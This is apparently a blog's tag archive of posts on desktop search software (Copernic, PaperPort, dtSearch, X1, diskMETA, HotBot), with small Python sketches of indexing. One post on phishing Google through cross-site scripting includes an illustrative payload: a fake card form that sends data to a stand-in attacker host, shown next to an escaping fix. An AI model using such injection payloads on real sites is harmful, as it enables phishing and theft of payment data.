Tag Archives: Desktop search

Copernic’s New Search

Copernic have officially launched version 2 of their excellent Desktop Search software. It’s been in beta for a while and it’s very good, though I’d still like to see more economical use of screen space: not all of us work on big, high-res screens. The press release isn’t out yet but should be here when it is. The pre-release page is here.


The PaperPort View

Further to my column in this week’s WSJ.com/AWSJ on PaperPort Pro and PaperMaster Pro, here are some e-mailed answers from Bob Anderson (ScanSoft Regional Director Asia Pacific and Japan) in response to my questions about PaperPort Pro:

1) What are the improvements in version 10 (PaperPort Professional 10) over previous versions?

A) Faster and easier folder navigation with Bookmark Workspaces and Split Desktop. Bookmark Workspaces allow you to bookmark your most frequently used folders and quickly jump back to them when you need them. Using the Split Desktop you can also look into two folders at once to move files quickly and easily between them, or simply to compare the contents of two folders at the same time.

B) A new All-in-One Search Engine and Index Manager for faster and more flexible indexing of scanned files and faster retrieval of the documents you search for.

C) PDF Support

a) PDF Create! PaperPort includes the capability to create PDF files from all of your MS Office documents or any other PC application with PDF Create! – just like Adobe® Acrobat®. PDF has emerged as the universal standard for sharing and archiving documents and images. The PDF format lets you send any document or image to anyone, regardless of whether they use a PC or a Macintosh® computer, and they can view and print the file – exactly as it looked on your computer – without the need to have the application that was used to create the original file. Now, there is no need to buy any additional PDF creating software – PaperPort 10 Professional does everything you need.

b) PDF Combine, Stack, Drag&Drop, Cut, Paste and Delete: Manipulating PDF files is easier. It accelerates the creation and assembly of custom documents by mimicking the way you work with paper documents. Easily add or remove pages, reorder them or create new documents with drag-and-drop tools that make working with electronic documents as simple as working with actual paper documents on your desktop.

c) PDF Security: PaperPort protects your information by allowing you to set security options for individual documents. Keep your content locked down by requiring a password to view or print sensitive information.

d) PageViewer PDF Rendering – Resolution Adjustable: Customise the view on your desktop by increasing or decreasing the resolution of graphics in PageViewer mode to optimise PaperPort’s performance to suit your needs.

D) Superior document assembly capabilities that make working with digital documents as easy as working with real paper by using automatic conversion to PDF, Page Thumbnails and the Split Desktop. Page Thumbnails allow you to cut, copy, paste, delete and rearrange the pages of a PDF document. You may drag whole documents of ANY format (print capable) into the Page Thumbnails of a PDF document. The ability to assemble documents as easily as dragging pages or documents from one document to another is greatly enhanced by the Split Desktop that allows you to merge documents across two different folders.

E) Faster and more productive scanning with a new scanner interface that provides “One-click Scanning” and “Batch Scanning” capabilities.

F) PaperPort SET tools (Scanner Enhancement Technology) are on the desktop for fast document image corrections. The PaperPort SET Tools allow you to rotate, auto-straighten, convert document colours, adjust image colour, hue, etc. all with a right-click on any image document.

G) Unparalleled ease-of-use and accessibility to PDF creation functions, including password protection, integrated throughout PaperPort and popular Microsoft applications.

2) What kind of users, and usage, are you aiming at? Do you have any interesting customer stories about how they’ve used PP, or perhaps your own experience?

We are looking to provide comprehensive desktop document management solutions for individual knowledge workers in the small business marketplace or for functional workgroups in large organisations.

A) Document Management – Anyone that wants to eliminate the use of paper as their primary means of storage and retrieval will become more organised using their computer and PaperPort. This includes home, home office and any business application that currently relies on a paper process and is looking for a way to organise, find and share information more easily and efficiently.

B) Scan-to-Desktop – With the proliferation of network multifunction and digital copier devices, scanning has really become a mainstream business function. PaperPort Professional helps millions of professionals to eliminate paper and to streamline the way they work with all of their documents. With PaperPort, you can easily scan using any connected or networked scanning device, including flatbed, All-in-One and Multi-Function Devices. PaperPort supports WIA, TWAIN and ISIS scanner drivers as well as important industry-standard formats including PDF, TIFF and MAX. Its unique ability to work with desktop, network and departmental scanners and even digital copiers makes it an invaluable productivity application for organisations of all sizes. Users can e-mail, fax or send documents to repositories on a networked file server with a simple drag-and-drop.

We have many interesting customer case studies that are attached as separate files.

3) This kind of product has, in my view, remained quite niche. People still appear to be somewhat resistant to the idea of committing their paper to a scanner. Is this true, and if not, do you have any statistics to support your view? If it is the case, how are you going about convincing users to change their habits?

Document scanning adoption is increasing as improved, affordable networked multi-function and workgroup/departmental devices penetrate new market segments. Recent research by organisations such as Gartner Group and IDC shows that the adoption of scanners, particularly in the enterprise in a networked environment, has seen tremendous growth in recent years. Multi-function devices and networked or departmental scanners with automatic document feeders are the fastest-growing segment for scanner manufacturers, growing at 3.2 percent a year (source: Gartner), while colour multifunction devices are experiencing double-digit growth. These scanners are being used primarily for document scanning (rather than photo scanning, as may have been the case in the past), and e-mailing attachments has become more commonplace than faxing paper documents. As these devices continue to grow in popularity, so does the need for document management software such as PaperPort that allows people not only to get paper into a PC, but also to organise, find and share that information once it is in a digital environment.

The popularity of document management software also becomes particularly evident when we look at our customer base – nearly 4 million people use PaperPort, and say that, after e-mail, it is the application that they use most on their PC. We do recognise that we will likely never see a truly “paperless office,” but there is indeed a need for document management software such as PaperPort that allows digital and paper information to coexist and work together more efficiently.

According to Keith Kmetz, program director, Hardcopy Peripherals Solutions and Services, IDC, “The proliferation of network multifunction and digital copier devices, combined with intuitive applications such as PaperPort, has finally made document scanning a mainstream business function. Products like PaperPort Professional 10 give organisations the ability to deliver the benefits of scanning, PDF and document assembly to every business desktop.”

4) Where do you see the future of this kind of product? Is it going to morph into other products that index users’ documents (Desktop Search, etc), and do you see any combination of products like PP and voice recognition? After all, character recognition and voice recognition would appear to be cousins, and ScanSoft have strong footprints in both areas.

PaperPort is an environment to manage all kinds of documents. Scanning, document assembly and desktop search are all critical components in the document management lifecycle. PaperPort All-in-One search is already a comprehensive desktop search tool allowing you to search all scanned paper, image and text document types including PDF.

So where in managing documents do our customers need the most improvement to increase their productivity and find value in the next version of PaperPort? Voice recognition is definitely an area of growth, as improving accuracy allows for greater acceptance of the technology. Document collaboration, distribution and the effective use of multifunction devices are all areas where there is still significant opportunity for improvement and productivity. More and more multifunction devices are replacing single-purpose machines, making scanned documents more accessible, and so the tools to manage those documents at the desktop are in greater demand.

With regard to character and voice recognition, ScanSoft’s optical character recognition (OCR) technology can be used to create an index of a document by converting the ‘picture’ of the textual information within a document into computer text. Similarly, ScanSoft’s AudioMining technology can be used to create XML speech indexes of every spoken word contained in an audio or video file; in short, AudioMining does to audio and video what OCR does to a document. For the enterprise, particularly in industries where recording telephone calls is a requirement (such as banking and insurance), AudioMining can be used to jump directly to a specific location in a conversation. Public Web users could also benefit when searching for training videos, research talks at universities, government hearings, news conferences and so on.
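To make the “jump directly to a specific location” idea concrete, here is a minimal sketch of a spoken-word index. It assumes a speech recogniser has already produced (word, start time) pairs; that input format and the function names are hypothetical, and this shows the general idea (without the XML), not how ScanSoft’s AudioMining actually works.

```python
from collections import defaultdict


def build_time_index(transcript):
    """Map each lower-cased word to the times (in seconds) it was spoken.

    `transcript` is assumed to be a list of (word, start_seconds) pairs,
    the kind of output a speech recogniser might produce (hypothetical format).
    """
    index = defaultdict(list)
    for word, start in transcript:
        index[word.lower()].append(start)
    return dict(index)


def jump_points(index, word):
    """Return the offsets where `word` was spoken, earliest first."""
    return sorted(index.get(word.lower(), []))


# Hypothetical recogniser output for a recorded phone call.
call = [("I", 0.0), ("want", 0.4), ("to", 0.6), ("close", 0.8),
        ("my", 1.1), ("account", 1.3), ("today", 12.5), ("account", 14.2)]
idx = build_time_index(call)
print(jump_points(idx, "Account"))  # [1.3, 14.2]
```

A player could then seek straight to 1.3 or 14.2 seconds instead of making someone listen to the whole recording, which is the same trick OCR plays on a scanned page.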

5) The PP interface hasn’t changed much in a decade, arguably. Is this version a major GUI revamp, or are you sticking with what you have?

I’d say we accomplished a lot of both. We have a very large user base that is quite familiar with the features and functions of the program that are directly tied to the easy-to-use interface. We wanted to make changes that specifically enhance the productivity of document assembly, search, PDF creation, password protection and management to further the concept of “electronic paper” without compromising where our customers have already found significant value.

Also worth noting is that PaperPort is available in multiple languages, in both Western and now Asian language versions. ScanSoft added Chinese (Traditional & Simplified), Japanese & Korean, with OCR in the native language, to the product line-up during the latter half of 2004. The Asian version is coming to market through our various customers, including OEMs, licensees and general distribution partners.

6) Why is one not able to preview documents in thumbnail view (in other words, being able to see all pages of the document in thumbnail, while being able to see full size preview of a page in the same window by clicking on one of the thumbnails), a feature common in other programs as far back as 1998? I’ve always felt this to be a key weakness in PP.

PaperPort 10 features Page Thumbnails on both the PaperPort Desktop and within the PaperPort PageViewer. We have also added significant value to these thumbnails by allowing you to cut, copy, paste, delete and rearrange the pages of a PDF document. You may drag whole documents of ANY format into the page thumbnails of any PDF document for automatic conversion to PDF and easy document assembly (See PaperPort menu item “View:Page Thumbnails”).

7) Another weakness I’ve felt exists has been the OCR. Given ScanSoft’s strengths in this field, why is PP’s inbuilt engine not more powerful?

The features of PaperPort OCR are dedicated to specific tasks within PaperPort and are generally adequate for most business purposes providing an appropriate amount of value for our customers. To enhance the OCR capabilities a customer may add professional OCR speed, accuracy and value by purchasing ScanSoft OmniPage which will automatically upgrade the PaperPort OCR capability.

8) Where does Acrobat/PDF fit into all this? Both you and PaperMaster now support direct-to-PDF scanning, and products like Fujitsu’s ScanSnap use it by default. Is this the way things will go? Have they already snuffed out alternatives? What are the advantages of this, and are there disadvantages? Adobe’s interface, in my view, doesn’t make it easy for users to tweak, annotate or fix PDF files.

The greatest challenge to streamlining document-based processes in business is the fact that there are two incompatible dominant electronic document formats – Microsoft® Word and PDF. Microsoft Word provides professionals with a rich environment for document creation and collaborative authoring but the editable Microsoft Word format is not well suited for electronic publishing and online document storage. Conversely, PDF has expanded from its traditional roots as a design and pre-press tool to an electronic file sharing standard providing business users with a format that is well suited for the distribution, viewing and archiving of documents.

The result is that Microsoft Word is the standard for authoring and editing business documents, while PDF is becoming the preferred way of distributing and sharing business documents online. The pervasiveness of Microsoft Word (400 million) and Adobe® Acrobat® Reader (500 million) gives rise to the need for document management solutions that enable the seamless movement of documents between the two dominant formats.

However, traditional solutions for PDF creation and management, such as Adobe Acrobat, are not priced or designed with the business user in mind. The ScanSoft family of PDF products (PDF Create!, PDF Converter and PDF Converter Professional 2) addresses this need by giving business professionals the ability to move more seamlessly between the two dominant electronic document formats, Microsoft Word and PDF.

We extend this PDF support into PaperPort Professional 10 as well, by including not only Scan-to-PDF and the ability to convert any format to PDF, but also ScanSoft PDF Create!, which allows users to quickly create a PDF from any PC application, or merge multiple files into a PDF. We also continue to support and make available our own internal “PaperPort Image” format as well as supporting TIFF, JPEG, GIF and BMP as long as our customers require these formats. We also believe that a true desktop management system encompasses scanned file formats as well as popular digital application files.

dtSearch: Not Dead. Not Yet.

Despite my love of indexers (and I’m in Seventh Heaven now that all the big boys are throwing out desktop search engines like it was a Bay City Rollers’ reunion), I still stick with dtSearch for most of my searching. It’s expensive, it’s tough, it’s ugly, but it gets the job done. And now they’ve added a feature which might not get you too excited, but for me is key: better viewers (or file parsers, if you want to get technical) for Microsoft documents.

Version 6.5 of dtSearch Desktop (free to 6.x users) means you can see Word documents, Excel spreadsheets or PowerPoint presentations in their original glory. Now folks are going to say: well, I can do that with X1, or more or less any of the other indexers that include built-in viewers. I’d like to correct you: you can’t. Well, you can if you don’t have big files, but over a certain size you will get an error. And I have big Word files, all tabled up, which nearly always fail to appear. In dtSearch they did come up, but not with any decent formatting. Now they do. (Other features listed here.)

dtSearch, long the mainstay of a once-sparse field, is not going away quietly. Good for them.

The Desktop Search Dichotomy

I’ve updated my directory of desktop search engines and indexers to take into account the Yahoo/X1 tie-up and one or two other changes in the landscape since I created it. Yahoo!, as you have no doubt heard, is basically giving away a free version of X1, quite an excellent file indexer and searcher which would usually cost about $70. A nice deal, but all this leaves me with an odd taste in the mouth.

While I’ve been making a noise for years about this fundamental weakness in our computers (that we can find stuff online more easily than on our own computer), why is it only when the super big boys get in on the act that anyone stands up and takes notice? Enfish have been offering pretty much all this for at least five years, and while they didn’t do themselves any favours by making their software worse with each new release, I always believed that people would gradually realise that finding stuff was important and cotton on.

But no. This episode seems to confirm that only when a big company comes along and pushes something right in our face do we wake up to its usefulness. I guess it being free helps. But how many other great ideas are out there that we are ignoring?

Another nervous twitch I have over all this: Given how jittery Yahoo!’s PR were over breaking embargo about the formal release of a product that had been flagged since December, Desktop Search is clearly big business. But is it for the right reasons? Are companies falling over themselves to get inside our hard drives because they want us to be more productive people, or is there something else afoot? Perhaps privacy concerns might start to return to the debate as these programs proliferate.

How To Phish Google

I’ve long believed that phishing emails are just the beginning of a new kind of fraud which is likely to be sophisticated and fast moving. Here’s an example of what it might look like, courtesy of a British computer scientist called Jim Ley, written up at the security website Netcraft. Ley, Netcraft says, “has demonstrated that opportunities exist for fraudsters to launch phishing attacks using cross site scripting bugs on the very widely used Google sites.”

I’m not quite clear from either account whether this is one vulnerability or more, and whether it applies only since Google extended their desktop search to include files on your computer (rather than on the Internet).

As far as I can figure it out, it works like this. A bad guy, rather than try to lure a victim to his dodgy website using a socially engineered email or a virus, would ‘inject’ content into Google to do the same thing. So, say, a user would visit Google to find a credit card submission form which explains that Google is soon to become a subscription-only service at $5 per month, but that users could take advantage of an earlybird special offer to obtain lifetime free searches for just $10. (This is Ley’s example, cited by Netcraft.)
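For the technically curious, the root of this kind of cross-site scripting trick is usually a page that pastes whatever you typed back into itself without neutralising any markup. The sketch below is a generic illustration under that assumption, not Ley’s actual exploit or Google’s code; the two render functions and the attacker address are hypothetical.

```python
import html


def render_results_unsafe(query):
    # Vulnerable: the user-supplied query is pasted straight into the page,
    # so any markup in it (e.g. a fake payment form) is rendered by the browser.
    return f"<p>Results for {query}</p>"


def render_results_safe(query):
    # html.escape turns <, >, & and quotes into entities, so injected markup
    # is displayed as harmless text instead of being interpreted as HTML.
    return f"<p>Results for {html.escape(query)}</p>"


# A hypothetical payload an attacker might smuggle into a link's query string.
payload = ('<form action="http://attacker.example/pay">'
           'Card number: <input name="cc"></form>')
print(render_results_unsafe(payload))
print(render_results_safe(payload))
```

Because the injected form arrives on the genuine site’s own page, the victim sees a trusted address in the browser bar, which is what makes this more dangerous than a dodgy link in an email.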

Another vulnerability, in Google Desktop, would have “allowed an attacker to search a user’s local machine for passwords and report the results directly back to the attacker’s own web site,” Netcraft says. Both vulnerabilities have been fixed, though incompletely, according to Netcraft and Ley.

I don’t claim to understand the technical aspects of this, and it may be somewhat obscure. But what is worrying is that (a) Ley reports Google as being less than interested in addressing the issues he raised (two years ago, according to his website) and, (b) that if such tricks are occurring to diligent folk like Ley, they must be occurring to hackers and the Internet underground. I’ve said it before, and I’ll say it again: Phishing is not just misleading emails, it’s a multifaceted effort to part us ordinary folk from our online money. And it’s not going to go away. Indeed, like most things technological, it’s a fast escalating arms race, and I don’t think we’ve even started to get it figured out.

Ukraine Weighs In On The Search Stakes

Another addition to my index of indexing programs: diskMETA, from <META> Inc. “the largest search engine provider in Ukraine and a leader in Cyrillic multilingual search engine morphology technologies”.

A press release issued today says diskMETA is one of the fastest desktop search engines, and is available both as freeware and shareware. The program “is intended for extra large data volumes, UP TO 100 GIGABYTES. It can create up to 100 indexes, index up to ONE MILLION various files. The search time is never more than ONE SECOND”. It works on all Windows platforms (98 or higher).

The file search works with Office document formats (DOC, XLS, RTF, TXT), HTML pages, CHM, PDF files, and ZIP and RAR archives. There are three versions: Lite (free), Personal ($50) and Pro ($100), which supports morphological English searches and Intranet-wide searches.

The search technology used in diskMETA, apparently, “has a long and glorious history. It is used for a decade in the nationwide biggest and most popular web search engine www.meta.ua, in a series of search tools for web-sites and CD-rooms installed in most governmental and financial national institutions” in the Ukraine.

My tuppence worth? It’s fast, intuitive and unfussy. You can view the raw text in a special preview window, but it doesn’t support previews in the way that X1, dtSearch or the new Copernic Desktop Search do. That said, it’s great to see a new player on the block, especially one so enthusiastic.

Copernic’s Search Desktop Goes Live

Copernic has today released its Desktop Search program, the latest addition to the harvest of desktop indexing software we’ve been cataloging in recent months.

The press release says the software can “search your hard drive in less than a second to pinpoint the right picture, email, music file, etc.” while “your computer won’t slow down at all”. You also “don’t have to worry about bugs, spyware, ads” and, most importantly for some, you won’t have to pay for it.

Copernic Search Desktop “has been designed primarily for desktop search beginners, who will appreciate the care, thought, and hundreds of hours that have gone into the simplified user interface design. Advanced users will want to check out the wide array of customizable search features.”

I tried out a beta version a few weeks back and was impressed. Copernic have had some great products in their time, although Google rather took the sting out of their main search program. I felt the interface for the version I tried did not make the best use of space and wasn’t quite up to their usual standards. Copernic took the suggestions gracefully and have promised changes in future versions. Definitely worth checking out.

The New Search Wars

Search is getting big again. Will it work this time around?

Programs that search your hard drive have been around for a while, but few of them seem to last. There was Magellan, askSam (OK, still around, sort of), Altavista’s Desktop Search, dtSearch (still going strong) and Enfish (still around, barely breathing). That was in the 1990s. But it’s only recently we’ve seen folk get really excited about the space again: There’s X1, Tukaroo (bought out pre-launch by Ask Jeeves), HotBot Search, and now something called blinkx (thanks, Marjolein, for pointing it out.)

Blinkx was officially launched last month as “a free new search tool that thinks and links for you, eliminates the need for keywords or complex search methods, easily finding the information you seek whether it is on the Web, in the news or buried deep within files on your PC.” In other words, pretty much what the other guys do. I haven’t looked too closely at it, but the main idea, as co-founder Kathy Rittweger puts it, is easy search without the logistics: “By eliminating the mechanics of search, such as keywords or sorting through dozens of unqualified results, we drive users more quickly to their goal: finding something, even if they didn’t know it was there!”

That’s good, and I would have said before that that was the way to go, but nowadays I’m not so sure. I think that as disk space grows and people’s hard drives become more complex, different users need different grades of configurability. With most of these new search engines pitching to the ‘lite user’ there’s a danger the more serious document hunter gets left behind. It’s actually a simple calculation: Are you aiming at the casual user who is happy to stumble across a few documents they didn’t know they still had, or are you aiming at the user that needs to find all the documents relevant to their search?

Anyway, it’s good to see folk finally seeing this space for what it is: Horribly underserviced, full of missed opportunities and millions of folk lost on their own hard drives. With Google, Microsoft and others about to enter the fray, here’s hoping that we get something really good out of it.

Another Way To Find Stuff At Home and On The Net

Here’s another one of those tools that should have been around a long, long time ago (in fact one was but it went away: AltaVista Discovery. And don’t get me started on Enfish Tracker). It’s the desktop search engine that indexes your hard drive, the net, all that kind of stuff. Welcome to HotBot Desktop.

HotBot’s Desktop will let you “search local files, email (Outlook & Outlook Express), browser history, and RSS subscriptions. The HotBot Desktop creates a local index to allow you to quickly find local content as you are on or offline.” It also comes with an RSS feed reader and a built-in pop-up blocker.
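That “local index” is what makes these tools fast: instead of trawling the disk at search time, they record ahead of time which words appear in which files. Here is a minimal sketch of such an inverted index, assuming only plain .txt files under one folder; the function names are hypothetical, and real desktop indexers (HotBot’s included) also parse email, Office files, PDFs and more, and keep the index on disk.

```python
import re
from collections import defaultdict
from pathlib import Path

TOKEN = re.compile(r"\w+")


def build_index(root):
    """Build an inverted index: word -> set of file paths containing it.

    Only *.txt files are read in this sketch.
    """
    index = defaultdict(set)
    for path in Path(root).rglob("*.txt"):
        text = path.read_text(encoding="utf-8", errors="ignore")
        for word in TOKEN.findall(text.lower()):
            index[word].add(str(path))
    return index


def search(index, query):
    """Return the files containing every word in the query (an AND search)."""
    words = TOKEN.findall(query.lower())
    if not words:
        return set()
    result = set(index.get(words[0], set()))
    for word in words[1:]:
        result &= index.get(word, set())
    return result
```

Building the index is the slow part and happens once (then incrementally as files change); each later search is just a few dictionary lookups and set intersections, which is how these programs can claim sub-second results.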

ResourceShelf says it’s by no means perfect, noting some bugs that Lycos intends to fix in later versions. It also works only with Internet Explorer. Anyway, it’s great news that these things are back. I’m building up a list of indexing engines here. Please let me know if I’ve missed any.

A New Search Toolbar — from Copernic


This from the folks at Copernic, who produced a wonderful search engine called, er, Copernic, that has, perhaps, been overtaken by Google: introducing Copernic Meta, “completely new search software that can search multiple search engines in under a second directly from the Windows desktop bar or an IE browser”.

The file is a tad over a megabyte, and installs both into Internet Explorer and your taskbar (the bit at the bottom of the Windows 98/XP screen). Type a phrase in there and it will search nearly every search engine, and throw up a melange of results familiar to anyone who’s used Copernic the program. It’s elegant, configurable — and free.